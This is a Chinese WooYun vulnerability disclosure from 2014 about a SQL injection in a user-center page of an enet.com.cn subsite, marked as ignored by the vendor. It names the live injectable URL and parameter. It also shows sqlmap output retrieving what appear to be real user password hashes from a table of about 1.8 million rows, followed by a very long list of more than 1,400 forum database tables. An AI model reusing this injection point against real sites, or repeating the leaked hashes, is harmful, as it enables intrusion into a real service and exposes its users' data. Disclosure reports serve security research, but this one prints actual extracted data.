硅谷动力某子站SQL注射漏洞泄露大量用户数据

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080855

漏洞标题：硅谷动力某子站SQL注射漏洞泄露大量用户数据

漏洞作者：老和尚

提交时间：2014-10-26 22:46

修复时间：2014-10-31 22:48

公开时间：2014-10-31 22:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：19

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-26：细节已通知厂商并且等待厂商处理中
2014-10-31：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

勉强写个19吧、向一哥看齐、

详细说明：

漏洞存在页面:http://ucenter.enet.com.cn/avatar.php?uname=igrid2013'&size=samll
存在注入参数:uname=
一千多张表啊。
“一张表就有一百多万数据。”

[22:33:01] [INFO] the SQL query used returns 1845296 entries
due to huge table size do you want to remove ORDER BY clause gaining speed over
consistency? [y/N]
[22:33:07] [INFO] retrieved: -1
[22:33:09] [INFO] retrieved:
[22:33:10] [INFO] retrieved: -1
[22:33:11] [INFO] retrieved: 9d803addda5fcb9e91d4a31718294344
[22:33:12] [INFO] retrieved: -1
[22:33:14] [INFO] retrieved: c2338375359e9883d65d6e001f3ddcd1
[22:33:15] [INFO] retrieved: -1
[22:33:16] [INFO] retrieved: 25f9e794323b453885f5181f1b624d0b
[22:33:17] [INFO] retrieved: -1
[22:33:19] [INFO] retrieved:
[22:33:20] [INFO] retrieved: -1
[22:33:21] [INFO] retrieved: 4e7fd0a62fe85393cc2e661e8d7864a8
[22:33:22] [INFO] retrieved: -1
[22:33:24] [INFO] retrieved:
[22:33:25] [INFO] retrieved: -1
[22:33:26] [INFO] retrieved:
[22:33:27] [INFO] retrieved: -1
[22:33:29] [INFO] retrieved: 96e79218965eb72c92a549dd5a330112
[22:33:30] [INFO] retrieved: -1
[22:33:31] [INFO] retrieved: 723d505516e0c197e42a6be3c0af910e
[22:33:32] [INFO] retrieved: -1
[22:33:34] [INFO] retrieved: abf156f3cf64496f9da2cabca68d95fe
[22:33:35] [INFO] retrieved: -1

这么多表,我也就不测试了。
论坛导致千万数据泄漏啊。表貌似也有很多。

1419 tables]
+------------------------------------+
| #mysql50#[]bbs_searchindex         |
| [Table]admins                      |
| [Table]applications                |
| [Table]badwords                    |
| [Table]domains                     |
| [Table]failedlogins                |
| [Table]feeds                       |
| [Table]friends                     |
| [Table]mailqueue                   |
| [Table]memberfields                |
| [Table]members                     |
| [Table]mergemembers                |
| [Table]newpm                       |
| [Table]notelist                    |
| [Table]pct_ah                      |
| [Table]pm_indexes                  |
| [Table]pm_lists                    |
| [Table]pm_members                  |
| [Table]pm_messages_0               |
| [Table]pm_messages_1               |
| [Table]pm_messages_2               |
| [Table]pm_messages_3               |
| [Table]pm_messages_4               |
| [Table]pm_messages_5               |
| [Table]pm_messages_6               |
| [Table]pm_messages_7               |
| [Table]pm_messages_8               |
| [Table]pm_messages_9               |
| [Table]pms                         |
| [Table]protectedmembers            |
| [Table]settings                    |
| [Table]sqlcache                    |
| [Table]tags                        |
| [Table]thirdParty_bind             |
| [Table]vars                        |
| bbs_access                         |
| bbs_activities                     |
| bbs_activityapplies                |
| bbs_addons                         |
| bbs_adminactions                   |
| bbs_admincustom                    |
| bbs_admingroups                    |
| bbs_adminnotes                     |
| bbs_adminsessions                  |
| bbs_advertisements                 |
| bbs_announcements                  |
| bbs_attachmentfields               |
| bbs_attachments                    |
| bbs_attachpaymentlog               |
| bbs_attachtypes                    |
| bbs_banklog                        |
| bbs_bankstatus                     |
| bbs_banned                         |
| bbs_bbcodes                        |
| bbs_caches                         |
| bbs_court_judge                    |
| bbs_court_lawsuit                  |
| bbs_creditslog                     |
| bbs_crons                          |
| bbs_debateposts                    |
| bbs_debates                        |
| bbs_dropitem                       |
| bbs_failedlogins                   |
| bbs_faqs                           |
| bbs_favoriteforums                 |
| bbs_favorites                      |
| bbs_favoritethreads                |
| bbs_feeds                          |
| bbs_forumfields                    |
| bbs_forumlinks                     |
| bbs_forumrecommend                 |
| bbs_forums                         |
| bbs_imagetypes                     |
| bbs_invites                        |
| bbs_itemmarket                     |
| bbs_itempool                       |
| bbs_jhzhufu                        |
| bbs_jie                            |
| bbs_ks_mod                         |
| bbs_ks_mod_admin                   |
| bbs_ks_mod_czlog                   |
| bbs_ks_mod_log                     |
| bbs_ks_mod_money                   |
| bbs_ks_mod_pingjia                 |
| bbs_ks_mod_pm                      |
| bbs_lihun                          |
| bbs_magiclog                       |
| bbs_magicmarket                    |
| bbs_magics                         |
| bbs_medallog                       |
| bbs_medals                         |
| bbs_memberfields                   |
| bbs_membermagics                   |
| bbs_memberrecommend                |
| bbs_members                        |
| bbs_members_bak                    |
| bbs_members_bak_bak                |
| bbs_memberspaces                   |
| bbs_mobdomlog                      |
| bbs_moderators                     |
| bbs_modworks                       |
| bbs_mypetatk                       |
| bbs_mypetdata                      |
| bbs_myposts                        |
| bbs_mytasks                        |
| bbs_mythreads                      |
| bbs_navs                           |
| bbs_npcdata                        |
| bbs_onlinelist                     |
| bbs_onlinetime                     |
| bbs_orders                         |
| bbs_paymentlog                     |
| bbs_petconfig                      |
| bbs_petdeldata                     |
| bbs_pethecheng                     |
| bbs_petjobdata                     |
| bbs_petshopdata                    |
| bbs_pluginhooks                    |
| bbs_plugins                        |
| bbs_pluginvars                     |
| bbs_polloptions                    |
| bbs_polls                          |
| bbs_postban                        |
| bbs_postposition                   |
| bbs_posts                          |
| bbs_profilefields                  |
| bbs_projects                       |
| bbs_promotions                     |
| bbs_prompt                         |
| bbs_promptmsgs                     |
| bbs_prompttype                     |
| bbs_qiuhun                         |
| bbs_ranks                          |
| bbs_ratelog                        |
| bbs_regips                         |
| bbs_relatedthreads                 |
| bbs_reportlog                      |
| bbs_request                        |
| bbs_rewardlog                      |
| bbs_rsscaches                      |
| bbs_searchindex                    |
| bbs_sessions                       |
| bbs_settings                       |
| bbs_smilies                        |
| bbs_spacecaches                    |
| bbs_stats                          |
| bbs_statvars                       |
| bbs_styles                         |
| bbs_stylevars                      |
| bbs_tags                           |
| bbs_tasks                          |
| bbs_taskvars                       |
| bbs_teammate                       |
| bbs_templates                      |
| bbs_threads                        |
| bbs_threadsmod                     |
| bbs_threadtags                     |
| bbs_threadtypes                    |
| bbs_timumembers                    |
| bbs_tradecomments                  |
| bbs_tradelog                       |
| bbs_tradeoptionvars                |
| bbs_trades                         |
| bbs_typemodels                     |
| bbs_typeoptions                    |
| bbs_typeoptionvars                 |
| bbs_typevars                       |
| bbs_usergroups                     |
| bbs_validating                     |
| bbs_warnings                       |
| bbs_words                          |
| bbs_words_2                        |
| bbs_words__                        |
| bgbbs_access                       |
| bgbbs_activities                   |
| bgbbs_activityapplies              |
| bgbbs_addons                       |
| bgbbs_adminactions                 |
| bgbbs_admincustom                  |
| bgbbs_admingroups                  |
| bgbbs_adminnotes                   |
| bgbbs_adminsessions                |
| bgbbs_advertisements               |
| bgbbs_announcements                |
| bgbbs_attachmentfields             |
| bgbbs_attachments                  |
| bgbbs_attachpaymentlog             |
| bgbbs_attachtypes                  |
| bgbbs_banned                       |
| bgbbs_bbcodes                      |
| bgbbs_caches                       |
| bgbbs_creditslog                   |
| bgbbs_crons                        |
| bgbbs_debateposts                  |
| bgbbs_debates                      |
| bgbbs_failedlogins                 |
| bgbbs_faqs                         |
| bgbbs_favoriteforums               |
| bgbbs_favorites                    |
| bgbbs_favoritethreads              |
| bgbbs_feeds                        |
| bgbbs_forumfields                  |
| bgbbs_forumlinks                   |
| bgbbs_forumrecommend               |
| bgbbs_forums                       |
| bgbbs_imagetypes                   |
| bgbbs_invites                      |
| bgbbs_itempool                     |
| bgbbs_magiclog                     |
| bgbbs_magicmarket                  |
| bgbbs_magics                       |
| bgbbs_medallog                     |
| bgbbs_medals                       |
| bgbbs_memberfields                 |
| bgbbs_membermagics                 |
| bgbbs_memberrecommend              |
| bgbbs_members                      |
| bgbbs_memberspaces                 |
| bgbbs_moderators                   |
| bgbbs_modworks                     |
| bgbbs_myposts                      |
| bgbbs_mytasks                      |
| bgbbs_mythreads                    |
| bgbbs_navs                         |
| bgbbs_onlinelist                   |
| bgbbs_onlinetime                   |
| bgbbs_orders                       |
| bgbbs_paymentlog                   |
| bgbbs_pluginhooks                  |
| bgbbs_plugins                      |
| bgbbs_pluginvars                   |
| bgbbs_polloptions                  |
| bgbbs_polls                        |
| bgbbs_postposition                 |
| bgbbs_posts                        |
| bgbbs_profilefields                |
| bgbbs_projects                     |
| bgbbs_promotions                   |
| bgbbs_prompt                       |
| bgbbs_promptmsgs                   |
| bgbbs_prompttype                   |
| bgbbs_ranks                        |
| bgbbs_ratelog                      |
| bgbbs_regips                       |
| bgbbs_relatedthreads               |
| bgbbs_reportlog                    |
| bgbbs_request                      |
| bgbbs_rewardlog                    |
| bgbbs_rsscaches                    |
| bgbbs_searchindex                  |
| bgbbs_sessions                     |
| bgbbs_settings                     |
| bgbbs_smilies                      |
| bgbbs_spacecaches                  |
| bgbbs_stats                        |
| bgbbs_statvars                     |
| bgbbs_styles                       |
| bgbbs_stylevars                    |
| bgbbs_tags                         |
| bgbbs_tasks                        |
| bgbbs_taskvars                     |
| bgbbs_templates                    |
| bgbbs_threads                      |
| bgbbs_threadsmod                   |
| bgbbs_threadtags                   |
| bgbbs_threadtypes                  |
| bgbbs_tradecomments                |
| bgbbs_tradelog                     |
| bgbbs_tradeoptionvars              |
| bgbbs_trades                       |
| bgbbs_typemodels                   |
| bgbbs_typeoptions                  |
| bgbbs_typeoptionvars               |
| bgbbs_typevars                     |
| bgbbs_usergroups                   |
| bgbbs_validating                   |
| bgbbs_warnings                     |
| bgbbs_words                        |
| dcbbs_access                       |
| dcbbs_activities                   |
| dcbbs_activityapplies              |
| dcbbs_addons                       |
| dcbbs_adminactions                 |
| dcbbs_admincustom                  |
| dcbbs_admingroups                  |
| dcbbs_adminnotes                   |
| dcbbs_adminsessions                |
| dcbbs_advertisements               |
| dcbbs_announcements                |
| dcbbs_attachmentfields             |
| dcbbs_attachments                  |
| dcbbs_attachpaymentlog             |
| dcbbs_attachtypes                  |
| dcbbs_banned                       |
| dcbbs_bbcodes                      |
| dcbbs_caches                       |
| dcbbs_creditslog                   |
| dcbbs_crons                        |
| dcbbs_debateposts                  |
| dcbbs_debates                      |
| dcbbs_failedlogins                 |
| dcbbs_faqs                         |
| dcbbs_favoriteforums               |
| dcbbs_favorites                    |
| dcbbs_favoritethreads              |
| dcbbs_feeds                        |
| dcbbs_forumfields                  |
| dcbbs_forumlinks                   |
| dcbbs_forumrecommend               |
| dcbbs_forums                       |
| dcbbs_imagetypes                   |
| dcbbs_invites                      |
| dcbbs_itempool                     |
| dcbbs_magiclog                     |
| dcbbs_magicmarket                  |
| dcbbs_magics                       |
| dcbbs_medallog                     |
| dcbbs_medals                       |
| dcbbs_memberfields                 |
| dcbbs_membermagics                 |
| dcbbs_memberrecommend              |
| dcbbs_members                      |
| dcbbs_memberspaces                 |
| dcbbs_moderators                   |
| dcbbs_modworks                     |
| dcbbs_myposts                      |
| dcbbs_mytasks                      |
| dcbbs_mythreads                    |
| dcbbs_navs                         |
| dcbbs_onlinelist                   |
| dcbbs_onlinetime                   |
| dcbbs_orders                       |
| dcbbs_paymentlog                   |
| dcbbs_pluginhooks                  |
| dcbbs_plugins                      |
| dcbbs_pluginvars                   |
| dcbbs_polloptions                  |
| dcbbs_polls                        |
| dcbbs_postposition                 |
| dcbbs_posts                        |
| dcbbs_profilefields                |
| dcbbs_projects                     |
| dcbbs_promotions                   |
| dcbbs_prompt                       |
| dcbbs_promptmsgs                   |
| dcbbs_prompttype                   |
| dcbbs_ranks                        |
| dcbbs_ratelog                      |
| dcbbs_regips                       |
| dcbbs_relatedthreads               |
| dcbbs_reportlog                    |
| dcbbs_request                      |
| dcbbs_rewardlog                    |
| dcbbs_rsscaches                    |
| dcbbs_searchindex                  |
| dcbbs_sessions                     |
| dcbbs_settings                     |
| dcbbs_smilies                      |
| dcbbs_spacecaches                  |
| dcbbs_stats                        |
| dcbbs_statvars                     |
| dcbbs_styles                       |
| dcbbs_stylevars                    |
| dcbbs_tags                         |
| dcbbs_tasks                        |
| dcbbs_taskvars                     |
| dcbbs_templates                    |
| dcbbs_threads                      |
| dcbbs_threadsmod                   |
| dcbbs_threadtags                   |
| dcbbs_threadtypes                  |
| dcbbs_tradecomments                |
| dcbbs_tradelog                     |
| dcbbs_tradeoptionvars              |
| dcbbs_trades                       |
| dcbbs_typemodels                   |
| dcbbs_typeoptions                  |
| dcbbs_typeoptionvars               |
| dcbbs_typevars                     |
| dcbbs_usergroups                   |
| dcbbs_validating                   |
| dcbbs_warnings                     |
| dcbbs_words                        |
| diybbs_access                      |
| diybbs_activities                  |
| diybbs_activityapplies             |
| diybbs_addons                      |
| diybbs_adminactions                |
| diybbs_admincustom                 |
| diybbs_admingroups                 |
| diybbs_adminnotes                  |
| diybbs_adminsessions               |
| diybbs_advertisements              |
| diybbs_announcements               |
| diybbs_attachmentfields            |
| diybbs_attachments                 |
| diybbs_attachments_bak             |
| diybbs_attachpaymentlog            |
| diybbs_attachtypes                 |
| diybbs_banned                      |
| diybbs_bbcodes                     |
| diybbs_caches                      |
| diybbs_creditslog                  |
| diybbs_crons                       |
| diybbs_debateposts                 |
| diybbs_debates                     |
| diybbs_failedlogins                |
| diybbs_faqs                        |
| diybbs_favoriteforums              |
| diybbs_favorites                   |
| diybbs_favoritethreads             |
| diybbs_feeds                       |
| diybbs_forumfields                 |
| diybbs_forumlinks                  |
| diybbs_forumrecommend              |
| diybbs_forums                      |
| diybbs_imagetypes                  |
| diybbs_invites                     |
| diybbs_itempool                    |
| diybbs_magiclog                    |
| diybbs_magicmarket                 |
| diybbs_magics                      |
| diybbs_medallog                    |
| diybbs_medals                      |
| diybbs_memberfields                |
| diybbs_membermagics                |
| diybbs_memberrecommend             |
| diybbs_members                     |
| diybbs_memberspaces                |
| diybbs_moderators                  |
| diybbs_modworks                    |
| diybbs_myposts                     |
| diybbs_mytasks                     |
| diybbs_mythreads                   |
| diybbs_navs                        |
| diybbs_onlinelist                  |
| diybbs_onlinetime                  |
| diybbs_orders                      |
| diybbs_paymentlog                  |
| diybbs_pluginhooks                 |
| diybbs_plugins                     |
| diybbs_pluginvars                  |
| diybbs_polloptions                 |
| diybbs_polls                       |
| diybbs_postposition                |
| diybbs_posts                       |
| diybbs_posts_bak                   |
| diybbs_profilefields               |
| diybbs_projects                    |
| diybbs_promotions                  |
| diybbs_prompt                      |
| diybbs_promptmsgs                  |
| diybbs_prompttype                  |
| diybbs_ranks                       |
| diybbs_ratelog                     |
| diybbs_regips                      |
| diybbs_relatedthreads              |
| diybbs_reportlog                   |
| diybbs_request                     |
| diybbs_rewardlog                   |
| diybbs_rsscaches                   |
| diybbs_searchindex                 |
| diybbs_sessions                    |
| diybbs_settings                    |
| diybbs_smilies                     |
| diybbs_spacecaches                 |
| diybbs_stats                       |
| diybbs_statvars                    |
| diybbs_styles                      |
| diybbs_stylevars                   |
| diybbs_tags                        |
| diybbs_tasks                       |
| diybbs_taskvars                    |
| diybbs_templates                   |
| diybbs_threads                     |
| diybbs_threads_bak                 |
| diybbs_threadsmod                  |
| diybbs_threadtags                  |
| diybbs_threadtypes                 |
| diybbs_tradecomments               |
| diybbs_tradelog                    |
| diybbs_tradeoptionvars             |
| diybbs_trades                      |
| diybbs_typemodels                  |
| diybbs_typeoptions                 |
| diybbs_typeoptionvars              |
| diybbs_typevars                    |
| diybbs_usergroups                  |
| diybbs_validating                  |
| diybbs_warnings                    |
| diybbs_words                       |
| ehomebbs_access                    |
| ehomebbs_activities                |
| ehomebbs_activityapplies           |
| ehomebbs_addons                    |
| ehomebbs_adminactions              |
| ehomebbs_admincustom               |
| ehomebbs_admingroups               |
| ehomebbs_adminnotes                |
| ehomebbs_adminsessions             |
| ehomebbs_advertisements            |
| ehomebbs_announcements             |
| ehomebbs_attachmentfields          |
| ehomebbs_attachments               |
| ehomebbs_attachpaymentlog          |
| ehomebbs_attachtypes               |
| ehomebbs_banned                    |
| ehomebbs_bbcodes                   |
| ehomebbs_caches                    |
| ehomebbs_creditslog                |
| ehomebbs_crons                     |
| ehomebbs_debateposts               |
| ehomebbs_debates                   |
| ehomebbs_failedlogins              |
| ehomebbs_faqs                      |
| ehomebbs_favoriteforums            |
| ehomebbs_favorites                 |
| ehomebbs_favoritethreads           |
| ehomebbs_feeds                     |
| ehomebbs_forumfields               |
| ehomebbs_forumlinks                |
| ehomebbs_forumrecommend            |
| ehomebbs_forums                    |
| ehomebbs_imagetypes                |
| ehomebbs_invites                   |
| ehomebbs_itempool                  |
| ehomebbs_magiclog                  |
| ehomebbs_magicmarket               |
| ehomebbs_magics                    |
| ehomebbs_medallog                  |
| ehomebbs_medals                    |
| ehomebbs_memberfields              |
| ehomebbs_memberfields1             |
| ehomebbs_membermagics              |
| ehomebbs_memberrecommend           |
| ehomebbs_members                   |
| ehomebbs_members1                  |
| ehomebbs_memberspaces              |
| ehomebbs_moderators                |
| ehomebbs_modworks                  |
| ehomebbs_myposts                   |
| ehomebbs_mytasks                   |
| ehomebbs_mythreads                 |
| ehomebbs_navs                      |
| ehomebbs_onlinelist                |
| ehomebbs_onlinetime                |
| ehomebbs_orders                    |
| ehomebbs_paymentlog                |
| ehomebbs_pluginhooks               |
| ehomebbs_plugins                   |
| ehomebbs_pluginvars                |
| ehomebbs_polloptions               |
| ehomebbs_polls                     |
| ehomebbs_postposition              |
| ehomebbs_posts                     |
| ehomebbs_profilefields             |
| ehomebbs_projects                  |
| ehomebbs_promotions                |
| ehomebbs_prompt                    |
| ehomebbs_promptmsgs                |
| ehomebbs_prompttype                |
| ehomebbs_ranks                     |
| ehomebbs_ratelog                   |
| ehomebbs_regips                    |
| ehomebbs_relatedthreads            |
| ehomebbs_reportlog                 |
| ehomebbs_request                   |
| ehomebbs_rewardlog                 |
| ehomebbs_rsscaches                 |
| ehomebbs_searchindex               |
| ehomebbs_sessions                  |
| ehomebbs_settings                  |
| ehomebbs_smilies                   |
| ehomebbs_spacecaches               |
| ehomebbs_stats                     |
| ehomebbs_statvars                  |
| ehomebbs_styles                    |
| ehomebbs_stylevars                 |
| ehomebbs_tags                      |
| ehomebbs_tasks                     |
| ehomebbs_taskvars                  |
| ehomebbs_templates                 |
| ehomebbs_threads                   |
| ehomebbs_threadsmod                |
| ehomebbs_threadtags                |
| ehomebbs_threadtypes               |
| ehomebbs_tradecomments             |
| ehomebbs_tradelog                  |
| ehomebbs_tradeoptionvars           |
| ehomebbs_trades                    |
| ehomebbs_typemodels                |
| ehomebbs_typeoptions               |
| ehomebbs_typeoptionvars            |
| ehomebbs_typevars                  |
| ehomebbs_usergroups                |
| ehomebbs_usergroups1               |
| ehomebbs_validating                |
| ehomebbs_warnings                  |
| ehomebbs_words                     |
| fbbs_access                        |
| fbbs_activities                    |
| fbbs_activityapplies               |
| fbbs_addons                        |
| fbbs_adminactions                  |
| fbbs_admincustom                   |
| fbbs_admingroups                   |
| fbbs_adminnotes                    |
| fbbs_adminsessions                 |
| fbbs_advertisements                |
| fbbs_announcements                 |
| fbbs_attachmentfields              |
| fbbs_attachments                   |
| fbbs_attachpaymentlog              |
| fbbs_attachtypes                   |
| fbbs_banned                        |
| fbbs_bbcodes                       |
| fbbs_caches                        |
| fbbs_creditslog                    |
| fbbs_crons                         |
| fbbs_debateposts                   |
| fbbs_debates                       |
| fbbs_failedlogins                  |
| fbbs_faqs                          |
| fbbs_favoriteforums                |
| fbbs_favorites                     |
| fbbs_favoritethreads               |
| fbbs_feeds                         |
| fbbs_forumfields                   |
| fbbs_forumlinks                    |
| fbbs_forumrecommend                |
| fbbs_forums                        |
| fbbs_imagetypes                    |
| fbbs_invites                       |
| fbbs_itempool                      |
| fbbs_magiclog                      |
| fbbs_magicmarket                   |
| fbbs_magics                        |
| fbbs_medallog                      |
| fbbs_medals                        |
| fbbs_memberfields                  |
| fbbs_membermagics                  |
| fbbs_memberrecommend               |
| fbbs_members                       |
| fbbs_memberspaces                  |
| fbbs_moderators                    |
| fbbs_modworks                      |
| fbbs_myposts                       |
| fbbs_mytasks                       |
| fbbs_mythreads                     |
| fbbs_navs                          |
| fbbs_onlinelist                    |
| fbbs_onlinetime                    |
| fbbs_orders                        |
| fbbs_paymentlog                    |
| fbbs_pluginhooks                   |
| fbbs_plugins                       |
| fbbs_pluginvars                    |
| fbbs_polloptions                   |
| fbbs_polls                         |
| fbbs_postposition                  |
| fbbs_posts                         |
| fbbs_profilefields                 |
| fbbs_projects                      |
| fbbs_promotions                    |
| fbbs_prompt                        |
| fbbs_promptmsgs                    |
| fbbs_prompttype                    |
| fbbs_ranks                         |
| fbbs_ratelog                       |
| fbbs_regips                        |
| fbbs_relatedthreads                |
| fbbs_reportlog                     |
| fbbs_request                       |
| fbbs_rewardlog                     |
| fbbs_rsscaches                     |
| fbbs_searchindex                   |
| fbbs_sessions                      |
| fbbs_settings                      |
| fbbs_smilies                       |
| fbbs_spacecaches                   |
| fbbs_stats                         |
| fbbs_statvars                      |
| fbbs_styles                        |
| fbbs_stylevars                     |
| fbbs_tags                          |
| fbbs_tasks                         |
| fbbs_taskvars                      |
| fbbs_templates                     |
| fbbs_threads                       |
| fbbs_threadsmod                    |
| fbbs_threadtags                    |
| fbbs_threadtypes                   |
| fbbs_tradecomments                 |
| fbbs_tradelog                      |
| fbbs_tradeoptionvars               |
| fbbs_trades                        |
| fbbs_typemodels                    |
| fbbs_typeoptions                   |
| fbbs_typeoptionvars                |
| fbbs_typevars                      |
| fbbs_usergroups                    |
| fbbs_validating                    |
| fbbs_warnings                      |
| fbbs_words                         |
| gamebbs_2fly_gift                  |
| gamebbs_access                     |
| gamebbs_activities                 |
| gamebbs_activityapplies            |
| gamebbs_addons                     |
| gamebbs_adminactions               |
| gamebbs_admincustom                |
| gamebbs_admingroups                |
| gamebbs_adminnotes                 |
| gamebbs_adminsessions              |
| gamebbs_advertisements             |
| gamebbs_announcements              |
| gamebbs_attachmentfields           |
| gamebbs_attachments                |
| gamebbs_attachpaymentlog           |
| gamebbs_attachtypes                |
| gamebbs_banned                     |
| gamebbs_bbcodes                    |
| gamebbs_caches                     |
| gamebbs_creditslog                 |
| gamebbs_crons                      |
| gamebbs_debateposts                |
| gamebbs_debates                    |
| gamebbs_failedlogins               |
| gamebbs_faqs                       |
| gamebbs_favoriteforums             |
| gamebbs_favorites                  |
| gamebbs_favoritethreads            |
| gamebbs_feeds                      |
| gamebbs_forumfields                |
| gamebbs_forumlinks                 |
| gamebbs_forumrecommend             |
| gamebbs_forums                     |
| gamebbs_imagetypes                 |
| gamebbs_invites                    |
| gamebbs_itempool                   |
| gamebbs_magiclog                   |
| gamebbs_magicmarket                |
| gamebbs_magics                     |
| gamebbs_medallog                   |
| gamebbs_medals                     |
| gamebbs_memberfields               |
| gamebbs_membermagics               |
| gamebbs_memberrecommend            |
| gamebbs_members                    |
| gamebbs_memberspaces               |
| gamebbs_moderators                 |
| gamebbs_modworks                   |
| gamebbs_msdct                      |
| gamebbs_msdct_setting              |
| gamebbs_myposts                    |
| gamebbs_mytasks                    |
| gamebbs_mythreads                  |
| gamebbs_navs                       |
| gamebbs_onlinelist                 |
| gamebbs_onlinetime                 |
| gamebbs_orders                     |
| gamebbs_paymentlog                 |
| gamebbs_pluginhooks                |
| gamebbs_plugins                    |
| gamebbs_pluginvars                 |
| gamebbs_polloptions                |
| gamebbs_polls                      |
| gamebbs_postposition               |
| gamebbs_posts                      |
| gamebbs_profilefields              |
| gamebbs_projects                   |
| gamebbs_promotions                 |
| gamebbs_prompt                     |
| gamebbs_promptmsgs                 |
| gamebbs_prompttype                 |
| gamebbs_ranks                      |
| gamebbs_ratelog                    |
| gamebbs_regips                     |
| gamebbs_relatedthreads             |
| gamebbs_reportlog                  |
| gamebbs_request                    |
| gamebbs_rewardlog                  |
| gamebbs_rsscaches                  |
| gamebbs_searchindex                |
| gamebbs_sessions                   |
| gamebbs_settings                   |
| gamebbs_smilies                    |
| gamebbs_spacecaches                |
| gamebbs_stats                      |
| gamebbs_statvars                   |
| gamebbs_styles                     |
| gamebbs_stylevars                  |
| gamebbs_tags                       |
| gamebbs_tasks                      |
| gamebbs_taskvars                   |
| gamebbs_templates                  |
| gamebbs_threads                    |
| gamebbs_threadsmod                 |
| gamebbs_threadtags                 |
| gamebbs_threadtypes                |
| gamebbs_tradecomments              |
| gamebbs_tradelog                   |
| gamebbs_tradeoptionvars            |
| gamebbs_trades                     |
| gamebbs_typemodels                 |
| gamebbs_typeoptions                |
| gamebbs_typeoptionvars             |
| gamebbs_typevars                   |
| gamebbs_usergroups                 |
| gamebbs_validating                 |
| gamebbs_warnings                   |
| gamebbs_words                      |
| mbbs_access                        |
| mbbs_activities                    |
| mbbs_activityapplies               |
| mbbs_addons                        |
| mbbs_adminactions                  |
| mbbs_admincustom                   |
| mbbs_admingroups                   |
| mbbs_adminnotes                    |
| mbbs_adminsessions                 |
| mbbs_advertisements                |
| mbbs_announcements                 |
| mbbs_attachmentfields              |
| mbbs_attachments                   |
| mbbs_attachpaymentlog              |
| mbbs_attachtypes                   |
| mbbs_banned                        |
| mbbs_bbcodes                       |
| mbbs_caches                        |
| mbbs_creditslog                    |
| mbbs_crons                         |
| mbbs_debateposts                   |
| mbbs_debates                       |
| mbbs_failedlogins                  |
| mbbs_faqs                          |
| mbbs_favoriteforums                |
| mbbs_favorites                     |
| mbbs_favoritethreads               |
| mbbs_feeds                         |
| mbbs_forumfields                   |
| mbbs_forumlinks                    |
| mbbs_forumrecommend                |
| mbbs_forums                        |
| mbbs_forums_copy                   |
| mbbs_imagetypes                    |
| mbbs_invites                       |
| mbbs_itempool                      |
| mbbs_magiclog                      |
| mbbs_magicmarket                   |
| mbbs_magics                        |
| mbbs_medallog                      |
| mbbs_medals                        |
| mbbs_memberfields                  |
| mbbs_membermagics                  |
| mbbs_memberrecommend               |
| mbbs_members                       |
| mbbs_members_copy                  |
| mbbs_memberspaces                  |
| mbbs_moderators                    |
| mbbs_modworks                      |
| mbbs_myposts                       |
| mbbs_mytasks                       |
| mbbs_mythreads                     |
| mbbs_navs                          |
| mbbs_onlinelist                    |
| mbbs_onlinetime                    |
| mbbs_orders                        |
| mbbs_paymentlog                    |
| mbbs_pluginhooks                   |
| mbbs_plugins                       |
| mbbs_pluginvars                    |
| mbbs_polloptions                   |
| mbbs_polls                         |
| mbbs_postposition                  |
| mbbs_posts                         |
| mbbs_profilefields                 |
| mbbs_projects                      |
| mbbs_promotions                    |
| mbbs_prompt                        |
| mbbs_promptmsgs                    |
| mbbs_prompttype                    |
| mbbs_ranks                         |
| mbbs_ratelog                       |
| mbbs_regips                        |
| mbbs_relatedthreads                |
| mbbs_reportlog                     |
| mbbs_request                       |
| mbbs_rewardlog                     |
| mbbs_rsscaches                     |
| mbbs_searchindex                   |
| mbbs_sessions                      |
| mbbs_settings                      |
| mbbs_smilies                       |
| mbbs_spacecaches                   |
| mbbs_stats                         |
| mbbs_statvars                      |
| mbbs_styles                        |
| mbbs_stylevars                     |
| mbbs_tags                          |
| mbbs_tasks                         |
| mbbs_taskvars                      |
| mbbs_templates                     |
| mbbs_threads                       |
| mbbs_threadsmod                    |
| mbbs_threadtags                    |
| mbbs_threadtypes                   |
| mbbs_timumembers                   |
| mbbs_tradecomments                 |
| mbbs_tradelog                      |
| mbbs_tradeoptionvars               |
| mbbs_trades                        |
| mbbs_typemodels                    |
| mbbs_typeoptions                   |
| mbbs_typeoptionvars                |
| mbbs_typevars                      |
| mbbs_usergroups                    |
| mbbs_validating                    |
| mbbs_warnings                      |
| mbbs_words                         |
| nbbbs_access                       |
| nbbbs_activities                   |
| nbbbs_activityapplies              |
| nbbbs_addons                       |
| nbbbs_adminactions                 |
| nbbbs_admincustom                  |
| nbbbs_admingroups                  |
| nbbbs_adminnotes                   |
| nbbbs_adminsessions                |
| nbbbs_advertisements               |
| nbbbs_announcements                |
| nbbbs_attachmentfields             |
| nbbbs_attachments                  |
| nbbbs_attachpaymentlog             |
| nbbbs_attachtypes                  |
| nbbbs_banned                       |
| nbbbs_bbcodes                      |
| nbbbs_caches                       |
| nbbbs_creditslog                   |
| nbbbs_crons                        |
| nbbbs_debateposts                  |
| nbbbs_debates                      |
| nbbbs_failedlogins                 |
| nbbbs_faqs                         |
| nbbbs_favoriteforums               |
| nbbbs_favorites                    |
| nbbbs_favoritethreads              |
| nbbbs_feeds                        |
| nbbbs_forumfields                  |
| nbbbs_forumlinks                   |
| nbbbs_forumrecommend               |
| nbbbs_forums                       |
| nbbbs_imagetypes                   |
| nbbbs_invites                      |
| nbbbs_itempool                     |
| nbbbs_magiclog                     |
| nbbbs_magicmarket                  |
| nbbbs_magics                       |
| nbbbs_medallog                     |
| nbbbs_medals                       |
| nbbbs_memberfields                 |
| nbbbs_membermagics                 |
| nbbbs_memberrecommend              |
| nbbbs_members                      |
| nbbbs_memberspaces                 |
| nbbbs_moderators                   |
| nbbbs_modworks                     |
| nbbbs_myposts                      |
| nbbbs_mytasks                      |
| nbbbs_mythreads                    |
| nbbbs_navs                         |
| nbbbs_onlinelist                   |
| nbbbs_onlinetime                   |
| nbbbs_orders                       |
| nbbbs_paymentlog                   |
| nbbbs_pluginhooks                  |
| nbbbs_plugins                      |
| nbbbs_pluginvars                   |
| nbbbs_polloptions                  |
| nbbbs_polls                        |
| nbbbs_postposition                 |
| nbbbs_posts                        |
| nbbbs_profilefields                |
| nbbbs_projects                     |
| nbbbs_promotions                   |
| nbbbs_prompt                       |
